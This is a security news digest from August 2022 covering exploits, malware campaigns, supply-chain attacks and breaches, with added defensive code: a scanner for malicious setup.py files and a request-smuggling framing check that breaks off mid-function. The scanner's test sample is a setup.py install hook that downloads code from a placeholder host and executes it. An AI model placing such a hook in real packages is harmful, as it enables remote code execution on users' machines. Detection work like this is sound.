Researchers from Argentinian company Faraday Security have demonstrated proof-of-concept code to exploit a vulnerability they discovered in the Realtek RTL819x system-on-a-chip (SoC). This chip is used in millions of networking devices such as routers, so the patch will have to propagate through many device vendors before the exposure shrinks.
Ilascu, Ionut, Exploit out for critical Realtek flaw affecting many networking devices, Bleeping Computer, 16 August 2022. Available online at https://www.bleepingcomputer.com/news/security/exploit-out-for-critical-realtek-flaw-affecting-many-networking-devices/.
Equifax Fallout Continues; SEC Charges Three
We have written previously about security governance requirements, and in particular the guidance issued by the SEC in February 2018, which seemed to have been triggered by their investigations of the infamous Equifax breach. The same incident continues to have repercussions, this time for a finance manager who worked at the public relations firm engaged by Equifax to assist with the breach, as well as her husband and his brother. The SEC alleges that upon learning of the breach, Ann M. Dishinger tipped off her husband, who arranged with a former business client to buy put options on Equifax on the understanding that they would split any profits realized. The SEC also alleges that he also helped his brother set up a similar arrangement with an old high school friend. These arrangements allegedly netted approximately $US108,000 in profits, split between the participants.
U.S. Securities and Exchange Commission, SEC Charges Three Chicago-Area Residents with Insider Trading Around Equifax Data Breach Announcement, Litigation Release No. 25470, 16 August 2022. Available online at https://www.sec.gov/litigation/litreleases/2022/lr25470.htm.
Chrome Zero-Day In The Wild
A vulnerability in the Chrome desktop browser, first publicly disclosed by Google's Threat Analysis Group in July, now has an exploit circulating in the wild. CVE-2022-2856 is a case of insufficient validation of user input, and Google has responded by pushing out an update, which also fixes ten other security flaws, mostly relating to use-after-free bugs in Chrome components.
Lakshamanan, Ravie, New Google Chrome Zero-Day Vulnerability Being Exploited in the Wild, The Hacker News, 18 August 2022. Available online at https://thehackernews.com/2022/08/new-google-chrome-zero-day.html.
Trojan Dropper Lives On, Thanks to Anti-Forensics
Researchers from Secureworks have done a deep analysis on a sophisticated trojan dropper called DarkTortilla which has been circulating since 2015, yet manages to still spread widely, dropping malware on behalf of a wide range of threat actors, due to its complex anti-forensics techniques.
DarkTortilla usually activates via targeted malmails containing infected attachments, often zip files and other archives, or ISO images. When the user double-clicks to open the contained document, they actually run the DarkTortilla initial loader. From there, the core component goes to work, but what it does is highly configurable, with the configuration controlled by bitmap images. It will typically check to see if it is running in a virtual machine or sandbox, set up registry keys so it can persist, migrate itself to the Windows %TEMP% directory, process any add-on files, and switch its execution environment to its install directory. Once this is done, it injects and executes its main payload, taking additional steps to prevent interference with its various components.
Different threat actors will use DarkTortilla to deliver any of several different payloads - usually remote access trojans such as AgentTesla, NanoCore and AsyncRat, but also keystroke loggers and toolkits such as Metasploit and Cobalt Strike. Occasionally, it will deliver ransomware.
It is easy to see why this trojan dropper has lived so long - it's incredibly versatile and valuable to threat actors, and its sophisticated anti-forensics and configurability represent a considerable investment which is worth maintaining.
Counter Threat Unit Research Team, DarkTortilla Malware Analysis, Secureworks, 17 August 2022. Available online at https://www.secureworks.com/research/darktortilla-malware-analysis.
Lazarus Group Chases Crypto Via Job Seekers
North Korean threat groups notoriously pursue hard currency and crypto assets in an attempt to bypass sanctions, and Lazarus Group has recently been discovered targeting fintech job seekers using an infected PDF containing information about a job opening at exchange operator Coinbase.
While initial attacks infected Windows machines only, the latest variant also targets Mac users, with a malware payload signed with a certificate issued by Apple and possibly revoked by now.
Ilascu, Ionut, North Korean hackers use signed macOS malware to target IT job seekers, Bleeping Computer, 17 August 2022. Available online at https://www.bleepingcomputer.com/news/security/north-korean-hackers-use-signed-macos-malware-to-target-it-job-seekers/.
News Stories
(ISC)2 Election Process Criticised
As mentioned in a previous news brief, the election for the Board of Directors at (ISC)² continues to draw criticism from members. In a post to the (ISC)² Community discussion board, member Stephen Mencik, along with Wim Remes and Diana Contesti, points out some glaring flaws in the process:
- The Board apparently changed the process for nomination after the election was announced.
- This change was not announced to the membership.
- Nevertheless 85 people submitted nominations to run, but
- The Board reviewed these nominations, and then selected five candidates to run for the five open seats.
In effect, says Mencik, this means that the Board decided the election result with no reference to the membership. Concerned certification holders (are we really members?) might want to have their say.
Mencik, Stephen, post in thread "Petition to be on the ballot for the 2022 ISC2 Board of Directors Election", (ISC)2 Community discussion board, 16 August 2022. Available online at https://community.isc2.org/t5/Welcome/Petition-to-be-on-the-Ballot-for-the-2022-ISC2-Board-of/m-p/52476/highlight/true#M2084.
Ransomware Operators Hit UK Water Supplier
A ransomware group known as Clop claimed to have hit the largest UK water supplier, Thames Water. In response, Thames Water issued a statement via its website stating that it had not suffered a cyber-attack; instead, South Staffordshire PLC, operator of South Staffs Water and Cambridge Water, confirmed that it had been the victim of the attack. The company revealed that its corporate network had been affected, but that its water supply operations were not compromised.
Despite Clop's misfire, this is continuing evidence that ransomware gangs are keen to exploit critical infrastructure operations, further eroding resilience at a time of drought and water shortages.
Montalbano, Elizabeth, U.K. Water Supplier Hit with Clop Ransomware Attack, ThreatPost, 16 August 2022. Available online at https://threatpost.com/water-supplier-hit-clop-ransomware/180422/.
PyPI Supply-Chain Attacks - Python Packages Target Discord, Roblox
Kaspersky, Snyk and Checkpoint have found multiple trojaned Python packages in PyPI, the Python Package Index repository. The trojan code uses a variety of techniques; for example, a package examined by Checkpoint used code in the __init__.py file of the setup script to download and run a script which would search for and exfiltrate local passwords.
The latest discoveries include 12 distinct pieces of malware belonging to the same actor, which use PyInstaller to bundle a malicious application and its dependencies into one package that is then distributed via the Discord content delivery network, from where it infiltrates user browsers. It then exfiltrates passwords, cookies, web history and other data which the attackers can use to pivot to other targets using the stolen credentials.
The references below provide a lot of technical detail, but the overall message is that even more effort is required in the area of supply chain security.
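A defender-side triage check for the install-time pattern described above, added here as an example and not code from Kaspersky, Snyk or Checkpoint: it walks the AST of a setuptools-style setup.py (or __init__.py) and flags network-fetch, decode and code-execution calls, plus custom install hooks, with constructed sample inputs.

```python
"""Static triage of a package's install-time Python (setup.py or __init__.py).

Added example, not code from any of the cited reports. It flags the pattern
described above: install-time code that fetches something over the network
and executes it, optionally via a custom setuptools install command.
The sample sources at the bottom are constructed for illustration.
"""
import ast

# Calls grouped by what they do; fully qualified and bare (from-imported) forms.
CALL_CATEGORIES = {
    "network": {"urllib.request.urlopen", "urllib.request.urlretrieve",
                "urlopen", "urlretrieve", "requests.get", "requests.post"},
    "exec": {"exec", "eval", "os.system", "os.popen", "subprocess.run",
             "subprocess.Popen", "subprocess.call", "subprocess.check_output"},
    "decode": {"base64.b64decode", "b64decode", "base64.b85decode",
               "zlib.decompress", "marshal.loads"},
}
# setuptools command classes whose run() executes during "pip install".
INSTALL_COMMANDS = {"install", "develop", "egg_info"}


def dotted_name(node):
    """Return 'a.b.c' for a Name or Attribute chain, None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def scan_source(src, filename="<source>"):
    """Return (verdict, findings) for one Python source file.

    findings is a list of (category, line, name).  The verdict is 'suspicious'
    when a code-execution call is combined with a network fetch, an obfuscation
    decode or an install-time hook, the combination the reports describe;
    otherwise 'clean'.  A 'clean' verdict is a triage result, not proof of safety.
    """
    tree = ast.parse(src, filename=filename)
    findings = []
    for node in ast.walk(tree):
        if isinstance(node, ast.ClassDef):
            bases = {dotted_name(b) for b in node.bases} - {None}
            overrides_run = any(isinstance(b, ast.FunctionDef) and b.name == "run"
                                for b in node.body)
            if overrides_run and any(b.split(".")[-1] in INSTALL_COMMANDS
                                     for b in bases):
                findings.append(("install_hook", node.lineno, node.name))
        elif isinstance(node, ast.Call):
            name = dotted_name(node.func)
            for category, names in CALL_CATEGORIES.items():
                if name in names:
                    findings.append((category, node.lineno, name))
    seen = {category for category, _, _ in findings}
    suspicious = "exec" in seen and seen & {"network", "decode", "install_hook"}
    return ("suspicious" if suspicious else "clean"), findings


# Constructed sample: a setup.py whose post-install hook fetches and runs
# remote code (the URL is a placeholder, not a real indicator).
MALICIOUS_SETUP = '''
from setuptools import setup
from setuptools.command.install import install
import urllib.request, base64

class PostInstall(install):
    def run(self):
        install.run(self)
        blob = urllib.request.urlopen("http://example.invalid/s").read()
        exec(base64.b64decode(blob))

setup(name="pkg", version="0.0.1", cmdclass={"install": PostInstall})
'''

# Constructed sample: an ordinary setup.py with no install-time behaviour.
BENIGN_SETUP = '''
from setuptools import setup, find_packages
setup(name="pkg", version="1.0.0", packages=find_packages())
'''

if __name__ == "__main__":
    for label, src in (("malicious", MALICIOUS_SETUP), ("benign", BENIGN_SETUP)):
        verdict, findings = scan_source(src, label)
        print(label, verdict, findings)
```

Running this over every setup.py and __init__.py in a vendored dependency tree gives a cheap first pass; anything flagged still needs a human look, since legitimate build scripts occasionally download toolchains too.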
Bezvershenko, Leonid and Igor Kuznetsov, Two more malicious Python packages in the PyPI, Kaspersky SecureList, 16 August 2022. Available online at https://securelist.com/two-more-malicious-python-packages-in-the-pypi/107218/.
Suero, Kyle and Raul Onitza-Klugman, Snyk finds PyPI malware that steals Discord and Roblox credential and payment info, Snyk blog, 16 August 2022. Available online at https://snyk.io/blog/pypi-malware-discord-roblox-credential-payment-info/.
Uncredited, CloudGuard Spectral detects several malicious packages on PyPI - the official software repository for Python developers, Checkpoint Research, 8 August 2022. Available online at https://research.checkpoint.com/2022/cloudguard-spectral-detects-several-malicious-packages-on-pypi-the-official-software-repository-for-python-developers/.
Another Hardware Vulnerability in AMD processors
In another brief, we mentioned the ÆPIC vulnerability which affects Intel's SGX security architecture. Now comes news of yet another hardware vulnerability, CVE-2021-46778, which impacts AMD Zen 1, Zen 2 and Zen 3 architecture processors. The SQUIP (Scheduler Queue Usage via Interference Probing) attack is a side channel attack that threat actors could use to recover RSA keys. AMD has issued a bulletin, but no easy fix is available.
Gast, Stefan, et al., SQUIP: Exploiting the Scheduler Queue Contention Side Channel, preprint, August 2022. Available online at https://stefangast.eu/papers/squip.pdf.
Uncredited, Execution Unit Scheduler Contention Side-Channel Vulnerability on AMD Processors, AMD product security bulletin, 12 August 2022. Available online at https://www.amd.com/en/corporate/product-security/bulletin/amd-sb-1039.
Russian APT Phishes Defence, Intelligence, Academics
Microsoft has been tracking an espionage campaign it labels SEABORGIUM, apparently involving an APT variously known as Callisto, COLDRIVER and TA446. The campaign targets defence and intelligence consulting firms, thinktanks and academics, primarily in the US, UK, Nordic and Baltic states, and Eastern Europe, using phishing and credential theft techniques.
The campaign is highly targeted, using fake personas on social media to send innocuous emails and establish trust before sending a weaponized message containing or linking to a trojaned PDF file, which is hosted on Microsoft OneDrive.
Lakshamanan, Ravie, Microsoft Warns About Phishing Attacks by Russia-linked Hackers, The Hacker News, 16 August 2022. Available online at https://thehackernews.com/2022/08/microsoft-warns-about-phishing-attacks.html.
Aussie Roots Tractor
Continuing the Right-To-Repair debate, an Asia-based Australian security researcher showed DEFCON attendees how to get privileged access to the CANBUS display of a John Deere 4240 tractor. John Deere is much criticised for blocking access to their tractors' control systems, making repairs possible only via authorised dealers. It took researcher SickCodes a lot of expensive experimentation to finally break the Linux-based display, but in the end it was embarrassingly easy: he simply created an empty file called dealerAuth.txt on a USB memory stick inserted into the system.
Saarinen, Juha, Oh Deere: Aussie researcher roots tractor control system, IT News, 16 August 2022. Available online at https://www.itnews.com.au/news/oh-deere-aussie-researcher-roots-tractor-control-system-584004.
News Stories
Signal Users' Numbers Compromised By Twilio Breach
The Twilio breach a couple of weeks ago revealed the phone numbers of 1,900 Signal users, according to an advisory published by Signal. The Signal encrypted messaging app uses Twilio for phone number verification, and this is how the numbers were leaked. However, message history, contact lists, profile information and other data were not compromised.
Signal is contacting the affected users and prompting them to re-register the Signal app - this is necessary because it was possible for the attackers to register these phone numbers to another device using an SMS verification code revealed by the breach.
Uncredited, Twilio Incident: What Signal Users Need to Know, Signal Support, August 2022. Available online at https://support.signal.org/hc/en-us/articles/4850133017242.
Zoom Update Vulnerability Exposes Mac Users
A nasty vulnerability in the automatic update feature of the Zoom videoconferencing app for macOS could grant attackers root access, security researcher Patrick Wardle revealed at DefCon on Saturday. Although initial installation of Zoom prompts for the user password, subsequent updates do not, because the updater runs as root. By feeding it a package with the right name, an attacker could either downgrade the Zoom version or even install a trojan, earning the vuln a CVSS score of 8.8.
This is the most recent of a long series of vulnerabilities in Zoom; the company has released a patch which fixes this vulnerability but users really should not rely on the auto-update process to install it.
Purdy, Kevin, Update Zoom for Mac now to avoid root-access vulnerability, Ars Technica, 16 August 2022. Available online at https://arstechnica.com/information-technology/2022/08/zoom-patches-mac-auto-updater-vulnerability-that-granted-root-access/.
Zoom Security Bulletin ZSB-22018, Local Privilege Escalation in Zoom Client for Meetings for macOS, Zoom Inc., 13 August 2022. Available online at https://explore.zoom.us/en/trust/security/security-bulletin/.
Credential Theft Still Popular - Especially Callback Phishing
A new report from Ponemon Institute says that 54% of security incidents were caused by credential theft, followed by ransomware and DDoS attacks, backing similar results in the Verizon Data Breach Investigations Report. One leading cause: almost 60% of organizations do not revoke credentials once they are no longer needed, and these unused and unmonitored accounts are easy prey for attackers.
But as user awareness is improving resistance to simple phishing attacks, spear-phishers are increasing their use of hybrid techniques such as barrel-phishing and callback phishing. A report from Agari claims that while phishing attacks have increased by only 6% since Q1 2021, callback phishing has increased by 625%.
Toulas, Bill, Callback phishing attacks see massive 625% growth since Q1 2021, Bleeping Computer, 15 August 2022. Available online at https://www.bleepingcomputer.com/news/security/callback-phishing-attacks-see-massive-625-percent-growth-since-q1-2021/.
Uncredited, Credential Theft Is (Still) A Top Attack Method, The Hacker News, 15 August 2022. Available online at https://thehackernews.com/2022/08/credential-theft-is-still-top-attack.html.
Uncredited, The State of Cybersecurity and Third-Party Remote Access Risk, SecureLink (sponsor), August 2022. Available online at https://www.securelink.com/research-reports/the-state-of-cybersecurity-and-third-party-remote-access-risk/ (registration required).
Android Banking Trojan Expands Capabilities and Reach
The SOVA (Russian for owl) banking trojan, which first appeared in September 2021, has continued to develop. The trojan uses the Accessibility Services feature of Android to overlay its own form fields over banking and shopping apps, and in its latest incarnation, SOVA v4, is able to intercept two-factor authentication codes and steal cookies. The operators have also expanded its targets from Spain and the US, where it was first seen, to Australia, Brazil, China, India, the Philippines and the UK.
Lakshamanan, Ravie, SOVA Android Banking Trojan Returns With New Capabilities and Targets, The Hacker News, 15 August 2022. Available online at https://thehackernews.com/2022/08/sova-android-banking-trojan-returns-new.html.
News Stories
Microsoft Finally Reverses Advice on DogWalk
This story has been emerging for some time. Despite first claiming that the DogWalk vulnerability was not a security issue, Microsoft has now issued a patch for CVE-2022-34713 and is advising customers to install it as soon as possible. The patch was part of last week's Patch Tuesday (Wednesday in the Antipodes) update, so many users on an auto-update policy will already have installed it, but enterprise users may not yet have patched Windows Server systems.
The RCE vulnerability allows attackers to exploit the Microsoft Support Diagnostic Tool via either social engineering or phishing and has been known since January 2020, so this has been quite a long delay on Microsoft's part.
Trueman, Charlotte, Microsoft urges Windows users to run patch for DogWalk zero-day exploit, ComputerWorld, 11 August 2022. Available online at https://www.computerworld.com/article/3669434/microsoft-urges-windows-users-to-run-patch-for-dogwalk-zero-day-exploit.html.
Massive Ransomware Outage Hit UK NHS
A service provider to the UK's National Health Service has been hit by a targeted ransomware attack, shutting down or slowing access to patient records, the 111 telephone advice service and the out-of-hours appointment booking system for general practices. Some urgent treatment centres and mental health providers have also been affected.
At the time of writing, the National Cyber Security Centre and the Information Commissioner's Office are both working to investigate the attack on service provider Advanced, but have not identified who is behind the attack. Idle speculation suggests that it could be any of several groups who have spun off from the Conti gang, but there are many others who have specialised in healthcare attacks, including BlackCat, Quantum, Hive and AvosLocker.
Full restoration of services could take some weeks, as data must be restored, systems reconfigured and updated, additional controls possibly installed, and the remediation plans approved by NHS Digital. The repercussions are likely to continue for even longer, as patient data may well have been exfiltrated.
36 different healthcare trusts use Advanced's services; while the NHS is able to achieve economies of scale through this kind of arrangement, this breach illustrates the danger of putting so many eggs in one basket.
Milmo, Dan and Denis Campbell, Fears for patient data after ransomware attack on NHS software supplier, The Guardian, 11 August 2022. Available online at https://www.theguardian.com/society/2022/aug/11/fears-patient-data-ransomware-attack-nhs-software-supplier.
9,000 Machines Online With No Passwords
VNC (virtual network computing) is a popular cross-platform software tool for providing graphical remote access for system installation, configuration and management - it is used to install SuSE Linux Enterprise Server on IBM zSeries mainframes, for example, and is a popular alternative to SSH'ing to the command line for novice Linux system administrators.
Now security researchers at Cyble have discovered over 9,000 VNC endpoints which are not secured with a password, including SCADA and ICS systems such as water treatment plants, which could allow an attacker to remotely control pumps, causing all kinds of problems. While the systems are found all over the world, the majority are found in China (perhaps unsurprising considering its size) with Sweden not far behind (surprising considering its size).
Toulas, Bill, Over 9,000 VNC servers exposed online without a password, Bleeping Computer, 14 August 2022. Available online at https://www.bleepingcomputer.com/news/security/over-9-000-vnc-servers-exposed-online-without-a-password/.
Want to Program? Go Python
The August edition of the TIOBE Index, which charts the popularity of different programming languages, shows that Python has now definitively passed long-time leaders C and Java. Although C and C++ did gain popularity, primarily for systems programming where performance is the key criterion in language selection, the all-round capability of Python will probably see it retain the top spot for some time to come.
Because Python features a REPL (Read, Evaluate, Print, Loop) interface which allows interactive execution, it is quite easy to learn its basic features. However, it can also compile its code for efficiency, and so the language is used in everything from small Raspberry Pi-based embedded systems through scripting applications for systems administration and reporting to scientific computing, data analysis and machine learning.
If asked to recommend which language security professionals should pick up for occasional use, the answer would have to be Python.
Other security-related language movements include the continued growth of safe systems-programming language Rust and the first appearance of Google's new C-derived language, Carbon.
Uncredited, TIOBE Index for August 2022: Python going through the roof, TIOBE (The Importance of Being Earnest), August 2022. Available online at https://www.tiobe.com/tiobe-index/.
News Stories
Companies Profit from Stolen Code
Macintosh malware researcher Patrick Wardle has found his code, released as open source, in a number of commercial products. As exhibit one, he cites a software tool he created back in 2016, called OverSight. The program monitors a Mac's microphone and webcam, to see whether any applications are accessing them without the knowledge of the owner (no surprise: a number were).
Several years later, Wardle was surprised to discover a number of commercial applications that were not only doing the same thing as OverSight, in a similar way, but also contained the same bugs. When he approached the three companies involved, they all acknowledged that his code had been used without his consent, and they all eventually paid for rights.
Although it is likely that employees used the code without their employers' knowledge, it does bring to light a risk we sometimes overlook, and emphasizes the need to educate developers on free and open source software licensing.
Faife, Corin, This Mac hacker's code is so good, corporations keep stealing it, The Verge, 11 August 2022. Available online at https://www.theverge.com/2022/8/11/23301130/patrick-wardle-mac-code-corporations-stealing-black-hat.
Meta's In-App Browsers Inject Code to Track You Outside Facebook
Security researcher Felix Krause has investigated the behaviour of the Facebook and Instagram app browser component, and discovered that the app could track every interaction with external websites viewed from within it. The app injects JavaScript code into every website it renders - the code doesn't currently track everything, but it could monitor every button clicked, every link, all text selections and even form inputs, including passwords.
Now, I was pretty sure that I'd set an option in the Facebook app for Android to turn off the in-app browser, and use the Chrome browser instead - but looking for it now, any such setting seems to be quite deeply buried. So I, for one, welcome our new surveillance capitalism overlords.
Krause, Felix, iOS Privacy: Instagram and Facebook can track anything you do on any website in their in-app browser, Felix Krause blog, 10 August 2022. Available online at https://krausefx.com/blog/ios-privacy-instagram-and-facebook-can-track-anything-you-do-on-any-website-in-their-in-app-browser.
Signed Secure UEFI Boot Loaders Not Trustworthy
The whole point of the Secure Boot process is to preserve a chain of trust that starts with the system's TPM chip and ends with a guaranteed-unmodified operating system. However, it turns out that three hardware vendors were somehow shipping UEFI boot loaders, signed by Microsoft, which were willing to bypass the process and execute arbitrary unsigned code. This would be the perfect way to install a rootkit, for example.
Fortunately, Microsoft's Patchday, earlier this week, saw updates shipped which fix the problem.
Lakshamanan, Ravie, Researchers Uncover UEFI Secure Boot Bypass in 3 Microsoft Signed Boot Loaders, The Hacker News, 12 March 2022. Available online at https://thehackernews.com/2022/08/researchers-uncover-uefi-secure-boot.html.
GitHub Proposes Adoption of Sigstore for NPM
As more and more software distributors adopt cryptographic signing of the packages they distribute, GitHub has asked developers to comment on a proposal to adopt Sigstore for the Node Package Manager (npm), which distributes JavaScript packages for node.js and related systems. Sigstore is an open-source project which operates public-key infrastructure to both sign packages and verify signatures, something that is seen as essential to the integrity of the software supply chain.
Lemos, Robert, Software Supply Chain Chalks Up a Security Win With New Crypto Effort, Dark Reading, 13 August 2022. Available online at https://www.darkreading.com/application-security/software-supply-chain-chalks-up-security-win-with-crypto-effort.
Chinese Threat Actor Targets Linux, Mac IM Application
Chinese group APT 27, variously known as Iron Tiger, Emissary Panda and LuckyMouse, is alleged to have deployed a JavaScript trojan in a popular instant messaging app called "MiMi". The backdoor first identifies the OS platform of the victim system, then downloads a back door called rshell. This then exfiltrates system information to its C2 server and awaits commands to search for and upload files to the server.
Older versions of the trojanized "MiMi" app also targeted Windows systems. The campaign appears to be targeting Chinese expatriates, perhaps to monitor their activities in other countries. The same threat actor has previously conducted cyberespionage campaigns internationally, attacking defence, healthcare, energy and technology enterprises. They were among several groups exploiting the Microsoft Exchange ProxyLogon vulnerability last year.
Gatlan, Sergiu, Chinese hackers backdoor chat app with new Linux, macOS malware, Bleeping Computer, 12 August 2022. Available online at https://www.bleepingcomputer.com/news/security/chinese-hackers-backdoor-chat-app-with-new-linux-macos-malware/.
NSFW Section (It's Saturday)
Excremental Retribution Exposed
A web service which sent a box of animal faeces, along with a personalised message, to enemies of their customers (because surely nobody would do this to their friends?) has been exploited by a customer who discovered an SQL injection vulnerability and downloaded the service's entire database.
Unfortunately for ShitExpress (I couldn't avoid saying it in the end), this customer was pompompurin, the owner of the Breached.co forum - exactly the kind of person who would spot a vulnerability - who was planning to use the service to send some dung to a rival security researcher. Instead, he shared the contents of the database on the forum, revealing the motherlode of abusive messages.
The moral of the story: shit doesn't just happen.
Sharma, Ax, Anonymous poop gifting site hacked, customers exposed, Bleeping Computer, 12 August 2022. Available online at https://www.bleepingcomputer.com/news/security/anonymous-poop-gifting-site-hacked-customers-exposed/.
And that's it for this week!
News Stories
Facebook Draws Ire of Privacy and Freedom of Choice Advocates
Facebook is being criticized for surrendering the private messages of a teenager and her mother who were planning to use (and did use) a pharmaceutical product to terminate a pregnancy. The teenager, her mother and a man who assisted with disposal of the fetus have been charged with a number of offences, following investigations by police in Madison County, Nebraska, who had obtained a warrant requiring disclosure of the contents of an electronic communication.
Police subsequently seized the girl's phone and computer and retrieved the body of the fetus, which had been stillborn. The circumstances of the case are not as clear-cut as pro-choice advocates might like - the abortion was performed at 28 weeks gestation, which could be a crime prior to the contentious recent changes brought about by the US Supreme Court - but it does illustrate the way in which more recent cases will be prosecuted, with the cooperation of tech service providers.
The problem here is not Facebook; no US-based company, or company that operates in the US, be it a social media company, an email service provider, a messaging company or a telco, has the power to resist a warrant or court order issued by a US court. Those who seek privacy protections are going to have to use international service providers and also make use of encryption.
Koebler, Jason and Anna Merlan, This Is the Data Facebook Gave Police to Prosecute a Teenager for Abortion, Vice Motherboard, 9 August 2022. Available online at https://www.vice.com/amp/en/article/n7zevd/this-is-the-data-facebook-gave-police-to-prosecute-a-teenager-for-abortion.
Snort Rule Snafu Snookers Office 365
A Snort rule update pushed to Cisco Meraki firewalls accidentally blocked access to Microsoft Office 365. The Snort rule, 1-60381, is commented, "Microsoft Windows IIS denial-of-service attempt" and blocked a number of IP addresses belonging to Microsoft. Disabling the rule restored access, and Cisco has now pushed out an update.
What can we say, but: measure twice and cut once.
GiacomoS, [RESOLVED] Microsoft vulnerability and IPS/SNORT, Meraki Community forum, 11 August 2022. Available online at https://community.meraki.com/t5/Meraki-Service-Notices/RESOLVED-Microsoft-vulnerability-and-IPS-SNORT/ba-p/156649.
Microsoft 365 Status, We're working with our firewall partners to investigate snort rule 1-60381, Twitter thread, 11 August 2022. Available online at https://twitter.com/MSFT365Status/status/1557435310874587136.
SIM Box Used to Blast Smishes
The Australian Federal Police arrested two men who had allegedly used a SIM box to send out hundreds of thousands of SMS phishing messages which linked to fake bank and telco sites in order to capture the victims' credentials. The AFP allege the pair had been targeting customers of the Commonwealth Bank of Australia, National Australia Bank and Telstra since 2018.
A SIM box can hold hundreds of SIM cards and can send hundreds of thousands of SMS messages per day.
Noyes, Jenny, Phishing fraudsters used SIM box to fleece hundreds of victims, police allege, Sydney Morning Herald, 11 August 2022. Available online at https://www.smh.com.au/national/nsw/phishing-fraudsters-used-sim-box-to-fleece-hundreds-of-victims-police-allege-20220811-p5b8xv.html.
Ethical Question: Should We Build Quantum Computers?
Quantum physicist Emma McKay, a PhD student at McGill University, is concerned about how people practice science and develop technology. In an interview with the American Physical Society, she expresses the controversial view that perhaps we should not build quantum computers at all. McKay points out that one of the main applications of quantum computers is the optimization of financial market trades - essentially, making the rich richer. Then there are the possible military applications of quantum computers.
On the other hand, quantum annealing - the type of quantum computer currently sold by Canadian company D-Wave - might have wide application in optimization problems. But, says McKay, this might simply be used to optimize traffic flows for single-occupant vehicles, when a better approach from an environmental and economic point of view might be to promote public transport as well as bicycling infrastructure.
Do you remember the Ten Commandments of the Computer Professionals for Social Responsibility? The 9th Commandment says, "Thou shalt think about the social consequences of the program you are writing or the system you are designing". And then remember Shakespeare: it is "more honoured in the breach than in the observance". A timely reminder.
Chen, Sophia, Should We Build Quantum Computers at All?, American Physical Society News, 8 August 2022. Available online at https://www.aps.org/publications/apsnews/202209/build-quantum.cfm.
Ransomware Gang More Trouble Than Ever
The remnants of the Conti ransomware gang have continued to cause more trouble for enterprises all over the world. Several groups have spun off and are operating independently, using the BazarCall tactic pioneered by Conti to gain access to victims' networks.
BazarCall, also known as call-back phishing, starts with an email telling the recipient that a subscription is about to renew, but the payment can be cancelled by calling a particular number. The number is answered by a social engineer, who convinces the caller to start a remote access session, which will be used by a network intruder to scout the network defences and deploy tools which will not be detected.
At least three groups - called Silent Ransom Group, Quantum and Roy/Zeon - are using this technique, which allows them to defeat sophisticated automated defences.
So damaging have these attacks become that the US State Department is offering a $US10 million reward for information on five of the ransomware gang members. Posting a photo of the hacker known as 'Target', the State Department is asking for information about him and four other members known as 'Tramp', 'Dandis', 'Professor' and 'Reshaev' - the information to be provided via a Tor anonymizing network link.
The success of the BazarCall technique's social engineering carries a message: we cannot pin all our hopes on technical controls; when the human becomes the weakest link, we must ramp up our efforts in security education, training and awareness.
Abrams, Lawrence, US govt will pay you $10 million for info on Conti ransomware members, Bleeping Computer, 11 August 2022. Available online at https://www.bleepingcomputer.com/news/security/us-govt-will-pay-you-10-million-for-info-on-conti-ransomware-members/.
Ilascu, Ionut, Conti extortion gangs behind surge of BazarCall phishing attacks, Bleeping Computer, 10 August 2022. Available online at https://www.bleepingcomputer.com/news/security/conti-extortion-gangs-behind-surge-of-bazarcall-phishing-attacks/.
HTTP Request Smuggling Attacks
In a paper released via a Black Hat talk today, PortSwigger Director of Research James Kettle has expanded his previous work on attacks against web servers to show how the same techniques can be used to exploit vulnerabilities in the HTTP/2 request handling of browsers.
The techniques utilized are somewhat too involved to detail here, and rely on interactions between the HTTP/1.1, HTTP/2 and TCP protocols, along with the behaviour of reverse proxies and web content accelerators. For those interested, there's lots of good reading in the references below, while for everyone else, expect updates to popular web server software and browsers as the Bad Guys enjoy reading the same references and develop related exploits.
Kettle, James, Browser-Powered Desync Attacks: A New Frontier in HTTP Request Smuggling, white paper, 10 August 2022. Available online at https://portswigger.net/research/browser-powered-desync-attacks.
Vijayan, Jai, New HTTP Request Smuggling Attacks Target Web Browser, Dark Reading, 11 August 2022. Available online at https://www.darkreading.com/application-security/researcher-at-black-hat-describes-new-htpp-request-smuggling-attack.
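The common thread in request smuggling is that a front-end proxy and a back-end server disagree about where one request's body ends and the next begins. The following is an added example, not code from the original story or from PortSwigger's research: a strict framing check of the kind a reverse proxy or WAF can apply to an HTTP/1.1 request head before forwarding it. All function and class names are hypothetical, and the sample requests are constructed, not captured traffic. The decision rules follow RFC 7230 section 3.3.3, choosing "reject" wherever the RFC allows either rejecting or repairing the message.

```python
import re

# Added illustration of a strict HTTP/1.1 framing check (hypothetical names;
# not code from any real proxy or from the research discussed above).

class AmbiguousFraming(ValueError):
    """The request head admits more than one reading of where the body ends."""

# RFC 7230 "token" characters: header names and transfer-codings must be tokens.
_TOKEN = re.compile(r"^[!#$%&'*+.^_`|~0-9A-Za-z-]+$")
_DIGITS = re.compile(r"^[0-9]+$")

def parse_head(raw: bytes):
    """Split a raw request into (request_line, headers, body_start).

    headers is a list of (name, value) in wire order with names lower-cased.
    Obsolete line folding and header names that are not tokens are rejected,
    because those are the usual places where one parser sees a header that
    another parser ignores."""
    text = raw.decode("latin-1")            # one byte per character, no loss
    end = text.find("\r\n\r\n")
    if end < 0:
        raise ValueError("incomplete request head")
    lines = text[:end].split("\r\n")
    headers = []
    for line in lines[1:]:
        if line[:1] in (" ", "\t"):
            raise AmbiguousFraming("obsolete line folding (obs-fold)")
        name, sep, value = line.partition(":")
        if not sep or not _TOKEN.match(name):
            raise AmbiguousFraming(f"malformed header field {line!r}")
        headers.append((name.lower(), value.strip(" \t")))
    return lines[0], headers, end + 4

def body_framing(raw: bytes) -> str:
    """Return 'chunked', 'length:<n>' or 'none' when the framing is unambiguous;
    raise AmbiguousFraming otherwise."""
    _, headers, _ = parse_head(raw)
    te = [v for n, v in headers if n == "transfer-encoding"]
    cl = [v for n, v in headers if n == "content-length"]
    if te and cl:
        # Two framings on one message: the precondition for CL.TE / TE.CL desyncs.
        raise AmbiguousFraming("both Transfer-Encoding and Content-Length present")
    if te:
        codings = [c.strip(" \t").lower() for v in te for c in v.split(",")]
        if any(not _TOKEN.match(c) for c in codings):
            raise AmbiguousFraming(f"obfuscated Transfer-Encoding {te!r}")
        if codings[-1] != "chunked":
            # If the final coding is not chunked the body length is unknowable
            # to an intermediary; RFC 7230 says answer 400 rather than guess.
            raise AmbiguousFraming(f"final transfer-coding is not chunked: {te!r}")
        return "chunked"
    if cl:
        if len(cl) > 1:
            raise AmbiguousFraming(f"duplicate Content-Length fields {cl!r}")
        if not _DIGITS.match(cl[0]):
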